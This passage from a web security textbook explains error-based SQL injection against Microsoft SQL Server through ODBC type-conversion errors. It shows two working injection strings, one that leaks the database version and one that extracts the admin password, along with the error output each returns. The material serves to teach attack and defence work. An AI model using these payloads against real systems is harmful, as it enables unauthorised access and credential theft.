The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

One particularly useful ODBC error message occurs when the database

attempts to cast an item of string data to a numeric data type. In this situation,

the error message generated actually contains the value of the string item that

caused the problem. If error messages are being returned to the browser, this

behavior can be a gold mine to an attacker because it allows arbitrary string

data to be returned reliably.

It is possible to inject into the 

WHERE

clause of a 

statement in such a

way as to perform an arbitrary second query and trigger a failed string con-

version on the result. One way of doing this is as follows, which in this exam-

ple returns version information about the database and operating system:

‘ or 1 in (select @@version)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting 

the nvarchar value ‘Microsoft SQL Server 2000 - 8.00.194 (Intel X86) 

Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation 

Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ‘ 

to a column of data type int.

More interestingly, given the information already gathered, you could

retrieve the password of the admin user as follows:

‘ or 1 in (select password from users where username=’admin’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting 

the varchar value ‘0wned’ to a column of data type int.